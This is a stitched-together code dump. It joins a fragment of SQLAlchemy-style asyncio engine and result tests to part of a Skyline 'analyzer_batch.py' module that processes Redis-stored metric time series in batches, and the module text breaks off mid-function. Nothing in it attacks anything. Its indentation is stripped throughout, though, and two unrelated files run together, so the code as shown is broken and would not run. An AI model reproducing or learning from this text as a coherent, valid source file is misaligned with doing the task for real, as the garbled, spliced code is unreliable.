async def test_connect_ctxmanager(self, async_engine):
async with async_engine.connect() as conn:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
@async_test
async def test_connect_plain(self, async_engine):
conn = await async_engine.connect()
try:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
finally:
await conn.close()
@async_test
async def test_connection_not_started(self, async_engine):
conn = async_engine.connect()
testing.assert_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncConnection context has not been started and "
"object has not been awaited.",
conn.begin,
)
@async_test
async def test_transaction_commit(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
await conn.execute(delete(users))
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_savepoint_rollback_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_savepoint_commit_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.commit()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_transaction_rollback(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
trans = conn.begin()
await trans.start()
await conn.execute(delete(users))
await trans.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_conn_transaction_not_started(self, async_engine):
async with async_engine.connect() as conn:
trans = conn.begin()
with expect_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncTransaction context has not been started "
"and object has not been awaited.",
):
await trans.rollback(),
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_some_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0.1,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_no_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@async_test
async def test_create_async_engine_server_side_cursor(self, async_engine):
testing.assert_raises_message(
asyncio_exc.AsyncMethodRequired,
"Can't set server_side_cursors for async engine globally",
create_async_engine,
testing.db.url,
server_side_cursors=True,
)
class AsyncEventTest(EngineFixture):
"""The engine events all run in their normal synchronous context.
we do not provide an asyncio event interface at this time.
"""
__backend__ = True
@async_test
async def test_no_async_listeners(self, async_engine):
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(async_engine, "before_cursor_execute", mock.Mock())
conn = await async_engine.connect()
with testing.expect_raises_message(
NotImplementedError,
"asynchronous events are not implemented "
"at this time. Apply synchronous listeners to the "
"AsyncEngine.sync_engine or "
"AsyncConnection.sync_connection attributes.",
):
event.listen(conn, "before_cursor_execute", mock.Mock())
@async_test
async def test_sync_before_cursor_execute_engine(self, async_engine):
canary = mock.Mock()
event.listen(async_engine.sync_engine, "before_cursor_execute", canary)
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[mock.call(sync_conn, mock.ANY, "select 1", (), mock.ANY, False)],
)
@async_test
async def test_sync_before_cursor_execute_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
sync_conn = conn.sync_connection
event.listen(
async_engine.sync_engine, "before_cursor_execute", canary
)
await conn.execute(text("select 1"))
eq_(
canary.mock_calls,
[mock.call(sync_conn, mock.ANY, "select 1", (), mock.ANY, False)],
)
@async_test
async def test_event_on_sync_connection(self, async_engine):
canary = mock.Mock()
async with async_engine.connect() as conn:
event.listen(conn.sync_connection, "begin", canary)
async with conn.begin():
eq_(
canary.mock_calls,
[mock.call(conn.sync_connection)],
)
class AsyncInspection(EngineFixture):
__backend__ = True
@async_test
async def test_inspect_engine(self, async_engine):
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncEngine is currently not supported.",
):
inspect(async_engine)
@async_test
async def test_inspect_connection(self, async_engine):
async with async_engine.connect() as conn:
with testing.expect_raises_message(
exc.NoInspectionAvailable,
"Inspection on an AsyncConnection is currently not supported.",
):
inspect(conn)
class AsyncResultTest(EngineFixture):
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_all(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
all_ = await result.all()
if filter_ == "mappings":
eq_(
all_,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
all_,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_aiter(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
rows = []
async for row in result:
rows.append(row)
if filter_ == "mappings":
eq_(
rows,
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(1, 20)
],
)
elif filter_ == "scalars":
eq_(
rows,
["name%d" % i for i in range(1, 20)],
)
else:
eq_(rows, [(i, "name%d" % i) for i in range(1, 20)])
@testing.combinations((None,), ("mappings",), argnames="filter_")
@async_test
async def test_keys(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
eq_(result.keys(), ["user_id", "user_name"])
await result.close()
@async_test
async def test_unique_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
union_all(select(users), select(users)).order_by(
users.c.user_id
)
)
all_ = await result.unique().all()
eq_(all_, [(i, "name%d" % i) for i in range(1, 20)])
@async_test
async def test_columns_all(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
all_ = await result.columns(1).all()
eq_(all_, [("name%d" % i,) for i in range(1, 20)])
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_partitions(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(select(users))
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars(1)
check_result = []
async for partition in result.partitions(5):
check_result.append(partition)
if filter_ == "mappings":
eq_(
check_result,
[
[
{"user_id": i, "user_name": "name%d" % i}
for i in range(a, b)
]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
elif filter_ == "scalars":
eq_(
check_result,
[
["name%d" % i for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
else:
eq_(
check_result,
[
[(i, "name%d" % i) for i in range(a, b)]
for (a, b) in [(1, 6), (6, 11), (11, 16), (16, 20)]
],
)
@testing.combinations(
(None,), ("scalars",), ("mappings",), argnames="filter_"
)
@async_test
async def test_one_success(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).limit(1).order_by(users.c.user_name)
)
if filter_ == "mappings":
result = result.mappings()
elif filter_ == "scalars":
result = result.scalars()
u1 = await result.one()
if filter_ == "mappings":
eq_(u1, {"user_id": 1, "user_name": "name%d" % 1})
elif filter_ == "scalars":
eq_(u1, 1)
else:
eq_(u1, (1, "name%d" % 1))
@async_test
async def test_one_no_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name == "nonexistent")
)
with expect_raises_message(
exc.NoResultFound, "No row was found when one was required"
):
await result.one()
@async_test
async def test_one_multi_result(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
result = await conn.stream(
select(users).where(users.c.user_name.in_(["name3", "name5"]))
)
with expect_raises_message(
exc.MultipleResultsFound,
"Multiple rows were found when exactly one was required",
):
await result.one()
@testing.combinations(
("scalars",), ("stream_scalars",), argnames="filter_"
)
@async_test
async def test_scalars(self, async_engine, filter_):
users = self.tables.users
async with async_engine.connect() as conn:
if filter_ == "scalars":
result = (await conn.scalars(select(users))).all()
elif filter_ == "stream_scalars":
result = await (await conn.stream_scalars(select(users))).all()
eq_(result, list(range(1, 20)))
class TextSyncDBAPI(fixtures.TestBase):
def test_sync_dbapi_raises(self):
with expect_raises_message(
exc.InvalidRequestError,
"The asyncio extension requires an async driver to be used.",
):
create_async_engine("sqlite:///:memory:")
@testing.fixture
def async_engine(self):
engine = create_engine("sqlite:///:memory:", future=True)
engine.dialect.is_async = True
return _async_engine.AsyncEngine(engine)
@async_test
@combinations(
lambda conn: conn.exec_driver_sql("select 1"),
lambda conn: conn.stream(text("select 1")),
lambda conn: conn.execute(text("select 1")),
argnames="case",
)
async def test_sync_driver_execution(self, async_engine, case):
with expect_raises_message(
exc.AwaitRequired,
"The current operation required an async execution but none was",
):
async with async_engine.connect() as conn:
await case(conn)
@async_test
async def test_sync_driver_run_sync(self, async_engine):
async with async_engine.connect() as conn:
res = await conn.run_sync(
lambda conn: conn.scalar(text("select 1"))
)
assert res == 1
assert await conn.run_sync(lambda _: 2) == 2
class AsyncProxyTest(EngineFixture, fixtures.TestBase):
@async_test
async def test_get_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
is_(trans.connection, conn)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_nested_transaction(self, async_engine):
async with async_engine.connect() as conn:
async with conn.begin() as trans:
n1 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n1)
n2 = await conn.begin_nested()
is_(conn.get_nested_transaction(), n2)
await n2.commit()
is_(conn.get_nested_transaction(), n1)
is_(conn.get_transaction(), trans)
@async_test
async def test_get_connection(self, async_engine):
async with async_engine.connect() as conn:
is_(
AsyncConnection._retrieve_proxy_for_target(
conn.sync_connection
),
conn,
)
def test_regenerate_connection(self, connection):
async_connection = AsyncConnection._retrieve_proxy_for_target(
connection
)
a2 = AsyncConnection._retrieve_proxy_for_target(connection)
is_(async_connection, a2)
is_not(async_connection, None)
is_(async_connection.engine, a2.engine)
is_not(async_connection.engine, None)
@testing.requires.predictable_gc
@async_test
async def test_gc_engine(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
eq_(len(ReversibleProxy._proxy_objects), 0)
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
@testing.requires.predictable_gc
@async_test
async def test_gc_conn(self, testing_engine):
ReversibleProxy._proxy_objects.clear()
async_engine = AsyncEngine(testing.db)
eq_(len(ReversibleProxy._proxy_objects), 1)
async with async_engine.connect() as conn:
eq_(len(ReversibleProxy._proxy_objects), 2)
async with conn.begin() as trans:
eq_(len(ReversibleProxy._proxy_objects), 3)
del trans
del conn
eq_(len(ReversibleProxy._proxy_objects), 1)
del async_engine
eq_(len(ReversibleProxy._proxy_objects), 0)
def test_regen_conn_but_not_engine(self, async_engine):
sync_conn = async_engine.sync_engine.connect()
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
async_conn2 = AsyncConnection._retrieve_proxy_for_target(sync_conn)
is_(async_conn, async_conn2)
is_(async_conn.engine, async_engine)
def test_regen_trans_but_not_conn(self, async_engine):
sync_conn = async_engine.sync_engine.connect()
async_conn = AsyncConnection._retrieve_proxy_for_target(sync_conn)
trans = sync_conn.begin()
async_t1 = async_conn.get_transaction()
is_(async_t1.connection, async_conn)
is_(async_t1.sync_transaction, trans)
async_t2 = async_conn.get_transaction()
is_(async_t1, async_t2)
|
analyzer_batch.py
|
from __future__ import division
import logging
try:
from Queue import Empty
except:
from queue import Empty
from time import time, sleep
from threading import Thread
from collections import defaultdict
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets in place of Manager().list to reduce memory and number of
# processes
# from multiprocessing import Process, Manager, Queue
from multiprocessing import Process, Queue
from msgpack import Unpacker
import os
from os import kill, getpid
import traceback
import re
from sys import version_info
import os.path
from ast import literal_eval
import settings
from skyline_functions import (
write_data_to_file, send_anomalous_metric_to, mkdir_p,
filesafe_metricname,
# @added 20170602 - Feature #2034: analyse_derivatives
nonNegativeDerivative, strictly_increasing_monotonicity, in_list,
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
get_redis_conn, get_redis_conn_decoded,
# @added 20200506 - Feature #3532: Sort all time series
sort_timeseries)
# @added 20200425 - Feature #3512: matched_or_regexed_in_list function
# Feature #3508: ionosphere_untrainable_metrics
# Feature #3486: analyzer_batch
from matched_or_regexed_in_list import matched_or_regexed_in_list
# @modified 20200423 - Feature #3504: Handle airgaps in batch metrics
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Changed to algoritms_batch so there is no pollution and
# analyzer and analyzer_batch are totally independent
# from algorithms import run_selected_algorithm
from algorithms_batch import run_selected_batch_algorithm
from algorithm_exceptions import TooShort, Stale, Boring
# TODO if settings.ENABLE_CRUCIBLE: and ENABLE_PANORAMA
# from spectrum import push_to_crucible
skyline_app = 'analyzer_batch'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
python_version = int(version_info[0])
this_host = str(os.uname()[1])
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
# @added 20190410 - Feature #2916: ANALYZER_ENABLED setting
try:
ANALYZER_ENABLED = settings.ANALYZER_ENABLED
logger.info('ANALYZER_ENABLED is set to %s' % str(ANALYZER_ENABLED))
except:
ANALYZER_ENABLED = True
logger.info('warning :: ANALYZER_ENABLED is not declared in settings.py, defaults to True')
try:
from settings import BATCH_PROCESSING
except:
BATCH_PROCESSING = None
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrcs have negatives values some they can be
# added to the ionosphere.untrainable_metrics Redis set
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
KNOWN_NEGATIVE_METRICS = list(settings.KNOWN_NEGATIVE_METRICS)
except:
KNOWN_NEGATIVE_METRICS = []
# @added 20200607 - Feature #3566: custom_algorithms
try:
CUSTOM_ALGORITHMS = settings.CUSTOM_ALGORITHMS
except:
CUSTOM_ALGORITHMS = None
try:
DEBUG_CUSTOM_ALGORITHMS = settings.DEBUG_CUSTOM_ALGORITHMS
except:
DEBUG_CUSTOM_ALGORITHMS = False
# @added 20200727 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
try:
from settings import ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
except:
ROOMBA_DO_NOT_PROCESS_BATCH_METRICS = False
if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS:
try:
from types import TupleType
except ImportError:
eliminated_in_python3 = True
from redis import WatchError
from msgpack import packb
# @added 20200817 - Feature #3684: ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS
# Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Allow for custom durations on namespaces
ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS = []
if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS:
try:
from settings import ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS
except:
ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS = False
# @added 20200815 - Feature #3678: SNAB - anomalyScore
try:
SNAB_DATA_DIR = settings.SNAB_DATA_DIR
except:
SNAB_DATA_DIR = '/opt/skyline/SNAB'
try:
SNAB_anomalyScore = settings.SNAB_anomalyScore
except:
SNAB_anomalyScore = {}
# @added 20201017 - Feature #3818: ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED
try:
ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED = settings.ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED
except:
ANALYZER_BATCH_PROCESSING_OVERFLOW_ENABLED = False
try:
BATCH_MODE = settings.BATCH_PROCESSING_BATCH_MODE
except:
BATCH_MODE = True
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
LOCAL_DEBUG = False
class AnalyzerBatch(Thread):
"""
The AnalyzerBatch class which controls the analyzer.batch thread and spawned
processes.
Made with love to the analyzer_batch playlist:
https://soundcloud.com/earthgecko/sets/analyzer_batch
https://soundcloud.com/thedeltariggs/ode-to-jeremiah (I can't tell what I've seen..)
https://soundcloud.com/egroove/premiere-francesco-chiocci-feat-black-soda-musumeci-remix-connaisseur-recordings (picking up pieces of my weary mind)
https://soundcloud.com/when-we-dip/premiere-francesco-chiocci-ft-black-soda-black-sunrise-peter-pardeike-remix
https://soundcloud.com/timgreen/atelier-francesco-manuel-feat-astrid-dead-end-tim-green-remixcityfox-1
https://soundcloud.com/imbernonmusic/edu-imbernon-fixing-fires
https://soundcloud.com/deep-house-amsterdam/oliver-koletzki-deep-house-amsterdam-dgtl-podcast-007
https://soundcloud.com/crosstownrebels/crm140-damian-lazarus-the-ancient-moons-vermillion-agoria-remix-1
https://soundcloud.com/wiewouwat/joy-wellboy-before-the-sunrise
https://soundcloud.com/agoria/damian-lazarus-the-ancent-moons-vermillion-agoria-remix
https://soundcloud.com/wearesoundspace/premiere-just-her-feat-kieran-fowkes-let-myself-go
https://soundcloud.com/watergaterecords/matthias-meyer-november-rain
https://soundcloud.com/musicthatmakesmewannasurf/mixtape-2-w-kosson
"""
def __init__(self, parent_pid):
"""
Initialize the AnalyzerBatch
Create the :obj:`self.batch_exceptions_q` queue
Create the :obj:`self.batch_anomaly_breakdown_q` queue
"""
super(AnalyzerBatch, self).__init__()
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
self.batch_exceptions_q = Queue()
self.batch_anomaly_breakdown_q = Queue()
def check_if_parent_is_alive(self):
"""
Self explanatory
"""
try:
kill(self.current_pid, 0)
kill(self.parent_pid, 0)
except:
exit(0)
def spin_batch_process(self, i, run_timestamp, metric_name, last_analyzed_timestamp, batch=[]):
"""
Assign a metric and last_analyzed_timestamp for a process to analyze.
:param i: python process id
:param run_timestamp: the epoch timestamp at which this process was called
:param metric_name: the FULL_NAMESPACE metric name as keyed in Redis
:param last_analyzed_timestamp: the last analysed timestamp as recorded
in the Redis key last_timestamp.basename key.
:return: returns True
"""
spin_start = time()
child_batch_process_pid = os.getpid()
metrics_processed = 0
if not batch:
batch_mode = False
metrics = [[metric_name, last_analyzed_timestamp]]
logger.info('child_batch_process_pid - %s, processing %s from %s' % (
str(child_batch_process_pid), metric_name, str(last_analyzed_timestamp)))
else:
batch_mode = True
metrics = batch
number_of_metrics = len(batch)
logger.info('child_batch_process_pid - %s, processing %s metrics in batch mode' % (
str(child_batch_process_pid), str(number_of_metrics)))
# Make process-specific dicts
exceptions = defaultdict(int)
anomaly_breakdown = defaultdict(int)
# Determine the unique Mirage and Ionosphere metrics once, which are
# used later to determine how Analyzer should handle/route anomalies
try:
mirage_unique_metrics = list(self.redis_conn_decoded.smembers('mirage.unique_metrics'))
except:
mirage_unique_metrics = []
try:
ionosphere_unique_metrics = list(self.redis_conn_decoded.smembers('ionosphere.unique_metrics'))
except:
ionosphere_unique_metrics = []
# In order to convert monotonic, incrementing metrics to a deriative
# metric
try:
derivative_metrics = list(self.redis_conn_decoded.smembers('derivative_metrics'))
except:
derivative_metrics = []
try:
non_derivative_metrics = list(self.redis_conn_decoded.smembers('non_derivative_metrics'))
except:
non_derivative_metrics = []
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
non_derivative_monotonic_metrics = list(settings.NON_DERIVATIVE_MONOTONIC_METRICS)
except:
non_derivative_monotonic_metrics = []
non_smtp_alerter_metrics = []
try:
non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('analyzer.non_smtp_alerter_metrics'))
except:
non_smtp_alerter_metrics = []
for item in metrics:
metric_name = item[0]
last_analyzed_timestamp = item[1]
if batch_mode:
metrics_processed += 1
logger.info('processing metric %s of %s' % (
str(metrics_processed), str(number_of_metrics)))
# Identify last timestamp
metric_timestamp = None
# Identify anomalies
# Handle EXPIRATION_TIME
# Ship to Analyzer, Mirage or Ionosphere
# @added 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# If multiple work items exist and the timestamp in the work item is
# older than the last analyzed timestamp reported by Redis key, just
# skip and remove the work item
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
# Check the last_timestamp metric Redis key
last_metric_timestamp_key = 'last_timestamp.%s' % base_name
redis_key_set = None
last_redis_timestamp = 0
try:
last_redis_timestamp_data = self.redis_conn_decoded.get(last_metric_timestamp_key)
last_redis_timestamp = int(last_redis_timestamp_data)
except:
logger.error('error :: failed to get Redis key %s' % last_metric_timestamp_key)
get_raw_series = True
if last_redis_timestamp:
if last_redis_timestamp > last_analyzed_timestamp:
get_raw_series = False
logger.info('The %s is %s, the passed last_analyzed_timestamp is %s, not getting raw_series returning' % (
last_metric_timestamp_key, str(last_redis_timestamp),
str(last_analyzed_timestamp)))
if LOCAL_DEBUG:
logger.debug('debug :: getting Redis time series data for %s' % (base_name))
raw_series = None
# @modified 20200728 - Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# Only resurface the timeseries if the work item timestamp is greater
# than the last analyzed timestamp reported by Redis key
if get_raw_series:
try:
raw_series = self.redis_conn.get(metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get %s from Redis' % metric_name)
raw_series = None
if not raw_series:
logger.info('No raw_series defined, returning')
# Remove for work list
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
if batch_mode:
continue
else:
return
try:
unpacker = Unpacker(use_list=False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
except:
timeseries = []
# @added 20200506 - Feature #3532: Sort all time series
# To ensure that there are no unordered timestamps in the time
# series which are artefacts of the collector or carbon-relay, sort
# all time series by timestamp before analysis.
original_timeseries = timeseries
if original_timeseries:
timeseries = sort_timeseries(original_timeseries)
del original_timeseries
try:
del raw_series
except:
pass
if LOCAL_DEBUG:
logger.debug('debug :: got Redis time series data for %s' % (base_name))
# @added 20200727 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Feature #3486: analyzer_batch
# euthanize keys if not done in roomba, allows for backfill processing
# via analyzer_batch
roombaed = False
if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS:
if LOCAL_DEBUG:
logger.debug('debug :: checking if roomba needs to be run on %s' % (base_name))
now = int(time())
duration = settings.FULL_DURATION + settings.ROOMBA_GRACE_TIME
key = metric_name
# @added 20200817 - Feature #3684: ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS
# Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS
# Feature #3480: batch_processing
# Allow for custom durations on namespaces, this is for testing to
# allow the Redis key to have data at a different resolution than
# FULL_DURATION, which allows for feeding a metric at 1 data point
# per 10 mins (ala fake Mirage)
try:
if ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS:
for metric_namespace, custom_full_duration in ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS:
if metric_namespace in base_name:
duration = custom_full_duration + settings.ROOMBA_GRACE_TIME
logger.info('batch_processing :: %s found in ROOMBA_BATCH_METRICS_CUSTOM_DURATIONS, duration for roomba set to %s' % (
base_name, str(duration)))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
namespace_unique_metrics = '%sunique_metrics' % str(settings.FULL_NAMESPACE)
euthanized = 0
trimmed_keys = 0
active_keys = 0
try:
# Put pipe back in multi mode
pipe = self.redis_conn.pipeline()
# WATCH the key
pipe.watch(key)
pipe.multi()
# There's one value. Purge if it's too old
last_timestamp = int(timeseries[-1][0])
# Do not purge if it has not been analyzed
if (last_timestamp - duration) > last_analyzed_timestamp:
logger.info('batch_processing :: last_timestamp is %s, but for roomba setting to the last_analyzed_timestamp (%s) as it has not been analyzed' % (
str(last_timestamp), str(last_analyzed_timestamp)))
last_timestamp = last_analyzed_timestamp
now = int(last_analyzed_timestamp)
logger.info('batch_processing :: doing roomba on %s with %s data points' % (key, str(len(timeseries))))
roombaed = True
try:
if python_version == 2:
if not isinstance(timeseries[0], TupleType):
if timeseries[0] < last_timestamp - duration:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
pipe.execute()
euthanized += 1
timeseries = []
if python_version == 3:
if not isinstance(timeseries[0], tuple):
if timeseries[0] < now - duration:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
pipe.execute()
euthanized += 1
timeseries = []
except IndexError:
timeseries = []
# Check if the last value is too old and purge
if timeseries[-1][0] < now - duration:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
pipe.execute()
euthanized += 1
timeseries = []
# Remove old datapoints and duplicates from timeseries
temp = set()
temp_add = temp.add
delta = now - duration
trimmed = [
tuple for tuple in timeseries
if tuple[0] > delta and
tuple[0] not in temp and not
temp_add(tuple[0])
]
# Purge if everything was deleted, set key otherwise
if len(trimmed) > 0:
# Serialize and turn key back into not-an-array
btrimmed = packb(trimmed)
if len(trimmed) <= 15:
value = btrimmed[1:]
elif len(trimmed) <= 65535:
value = btrimmed[3:]
trimmed_keys += 1
else:
value = btrimmed[5:]
trimmed_keys += 1
pipe.set(key, value)
active_keys += 1
else:
pipe.delete(key)
pipe.srem(namespace_unique_metrics, key)
euthanized += 1
pipe.execute()
except WatchError:
logger.info('batch_processing :: blocked from euthanizing %s' % (key))
except Exception as e:
# If something bad happens, zap the key and hope it goes away
# pipe.delete(key)
# pipe.srem(namespace_unique_metrics, key)
# pipe.execute()
# euthanized += 1
logger.info(e)
logger.info('batch_processing :: something bad happened but not euthanizing %s' % (key))
finally:
pipe.reset()
raw_series = None
try:
raw_series = self.redis_conn.get(metric_name)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get %s from Redis' % metric_name)
raw_series = None
if not raw_series:
logger.info('No raw_series defined after euthanizing %s, returning' % (key))
# Remove for work list
redis_set = 'analyzer.batch'
data = [metric_name, int(last_analyzed_timestamp)]
try:
self.redis_conn.srem(redis_set, str(data))
logger.info('analyzer_batch :: removed batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: analyzer_batch :: failed to remove batch metric item - %s - from Redis set - %s' % (str(data), redis_set))
if batch_mode:
continue
else:
return
try:
unpacker = Unpacker(use_list=False)
unpacker.feed(raw_series)
timeseries = list(unpacker)
if roombaed:
logger.info('batch_processing :: after roomba %s has %s data points' % (key, str(len(timeseries))))
except:
timeseries = []
# @added 20200506 - Feature #3532: Sort all time series
# To ensure that there are no unordered timestamps in the time
# series which are artefacts of the collector or carbon-relay, sort
# all time series by timestamp before analysis.
original_timeseries = timeseries
if original_timeseries:
timeseries = sort_timeseries(original_timeseries)
del original_timeseries
try:
del raw_series
except:
pass
timestamps_to_analyse = []
# Reverse the time series so that only the first (last) items now to be
# iterated and break after the necessary iterations so the entire
# time series is not iterated over.
reversed_timeseries = list(reversed(timeseries))
for timestamp, value in reversed_timeseries:
if int(timestamp) > last_analyzed_timestamp:
timestamps_to_analyse.append(int(timestamp))
else:
break
del reversed_timeseries
timestamps_to_analyse = list(reversed(timestamps_to_analyse))
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Handle there being no timestamps_to_analyse and report such as
# otherwise the only info logged is that the work key just gets removed
# 2020-04-14 12:57:25 :: 3222 :: there are 1 metrics to process in the analyzer.batch Redis set
# 2020-04-14 12:57:25 :: 3222 :: processing - ['vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total', 1586868000]
# 2020-04-14 12:57:25 :: 3222 :: starting 1 of 1 spin_batch_process
# 2020-04-14 12:57:25 :: 7852 :: batch :: child_batch_process_pid - 7852, processing vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total from 1586868000
# 2020-04-14 12:57:25 :: 7852 :: analyzer_batch :: removed work item - ['vista.demo_robustperception_io.prometheus.node_disk_read_time_seconds_total', 1586868000] - from Redis set - analyzer.batch
# 2020-04-14 12:57:25 :: 7852 :: spin_batch_process took 0.04 seconds
# 2020-04-14 12:57:25 :: 3222 :: 1 spin_batch_process completed in 0.10 seconds
# 2020-04-14 12:57:25 :: 3222 :: exceptions - Stale: 9, Boring: 6, TooShort: 0, Other: 0
